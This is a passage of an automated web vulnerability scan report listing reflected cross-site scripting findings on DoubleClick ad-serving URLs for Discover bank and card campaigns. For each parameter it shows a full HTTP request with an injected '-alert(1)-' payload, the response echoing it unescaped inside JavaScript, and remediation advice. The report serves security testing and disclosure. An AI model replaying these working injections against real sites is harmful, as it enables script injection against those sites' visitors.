GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=1561922438'-alert(1)-'30165b56046&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=;u=17908758;ord=7703464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4401
Date: Tue, 28 Jun 2011 01:29:09 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
'http://s0.2mdn.net/2279893/DBVault_300x250_Static.gif';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=1561922438'-alert(1)-'30165b56046&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201105/index.aspx%3Fsrc%3DX1PMIA';
var t
...[SNIP]...

1.67. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_pm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7318'-alert(1)-'1d7b10ff8e1 was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956f7318'-alert(1)-'1d7b10ff8e1&_pn=17908758&redirect=;u=17908758;ord=7703464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4921
Date: Tue, 28 Jun 2011 01:30:16 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
'300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956f7318'-alert(1)-'1d7b10ff8e1&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201101/index_v1.aspx%3Facmpgn%3D111_X1_300x250_feel_X1FEELA%26src%3DX1FEELA';
var target = '_blank';
var dcbgcolor = '
...[SNIP]...

1.68. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_pn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f697a'-alert(1)-'2dcff89fe8 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758f697a'-alert(1)-'2dcff89fe8&redirect=;u=17908758;ord=7703464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4640
Date: Tue, 28 Jun 2011 01:30:25 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
cwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758f697a'-alert(1)-'2dcff89fe8&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201007/index.aspx%3Fsrc%3DX1BUILDA';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/2279893/300x250.swf
...[SNIP]...

1.69. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [_s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90f62'-alert(1)-'94227e935c8 was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=1168390f62'-alert(1)-'94227e935c8&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=;u=17908758;ord=7703464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4644
Date: Tue, 28 Jun 2011 01:29:47 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
0x250.gif';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=1168390f62'-alert(1)-'94227e935c8&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201007/index.aspx%3Fsrc%3DX1BUILDA';
var target = '_blank';
var dcbgcolor = '';
var d
...[SNIP]...

1.70. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2b90'-alert(1)-'b8a211ccb10 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=c2b90'-alert(1)-'b8a211ccb10 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4829
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 01:30:26 GMT
Expires: Tue, 28 Jun 2011 01:30:26 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=c2b90'-alert(1)-'b8a211ccb10http://fb.discoverbank.com/campaigns/products/savings/201101/index_v1.aspx?acmpgn=111_X1_300x250_feel_X1FEELA&src=X1FEELA';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/22
...[SNIP]...

1.71. http://ad.doubleclick.net/adi/x1.rtb/discoverbank/poem/att [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discoverbank/poem/att

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff824'-alert(1)-'e40b80e5cff was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discoverbank/poem/att;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0cff824'-alert(1)-'e40b80e5cff&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=;u=17908758;ord=7703464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LOQ6DMBAF0J9AIiOuQYcGebz7EmmpvYw7Oo6Ug0bK69-KB4CtesNFmCmHkclxFSocBjU9tG-Njeim8Pwsx7Fi-g9XapVgyUqKFLvP1DkIJWc7G5-tTqIwA3FXeAHfS-EN3Cd-r8Yzo3MAAAA%3D%26dst%3Dhttp%253A%252F%252Ffb.discoverbank.com&_wp=AAABMNPcZrHEs0SZL6SRrmS1onK96l7WV18WHg&_nv=1&_CDbg=1822617&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAJnPGwAAAAAAUCoRAQAAAACXkxsAAAAAABZEEQEAAAAA5j4RAQAAAADM0hsAAAAAACFD7EGuR-F6FK7nPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAABiNTIxYWUxMS05NmY5LTQxYmUtYTE2Zi1jMGYwNWNjMTJlMGMkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAS0ctMDAwMDAwMDA1NjgzMTQzODMPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC4uCU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4644
Date: Tue, 28 Jun 2011 01:29:00 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
;
var dcgif = 'http://s0.2mdn.net/2279893/build_osa_300x250.gif';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0cff824'-alert(1)-'e40b80e5cff&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201007/index.aspx%3Fsrc%3DX1BUI
...[SNIP]...

1.72. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_a parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6436'-alert(1)-'d8cc99c698b was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/discovercard/poem5;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852f6436'-alert(1)-'d8cc99c698b&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=;u=17185423;ord=2154696? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQpWWed-BK01HHs7eg4EgdFTD8LDgDube5mEivx7k515EHKU6lL91ksZykl4fi8KS04_YfVYRbCxNEbNd-UvEhQr-xl3ZRzj4Qz0B4JF-D7TrgCnxd-cBxTmnMAAAA%3D%26dst%3Dhttps%253A%252F%252Fwww.discovercard.com%252F&_wp=AAABMNQHXBqdFcsUGr9klqNS4zQXZf-gdR5gRw&_nv=1&_CDbg=17184852&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFQ4BgEAAAAAWDgGAQAAAAB3kAAAAAAAAI86BgEAAAAAvjoGAQAAAAC_OgYBAAAAACJD7EEAAAAAAADgPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3Y2ZiYjZlMi0zZmRkLTRhMGEtOTNjOS04NjhkYzFiMDA2MTEkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAC45CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4313
Date: Tue, 28 Jun 2011 02:17:18 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
FINAL_300x250.jpg';
var dccreativewidth = '300';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852f6436'-alert(1)-'d8cc99c698b&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/getapp%3Fsc%3DKBD6';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'ht
...[SNIP]...

1.73. http://ad.doubleclick.net/adi/x1.rtb/discovercard/poem5 [_c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/discovercard/poem5

Issue detail

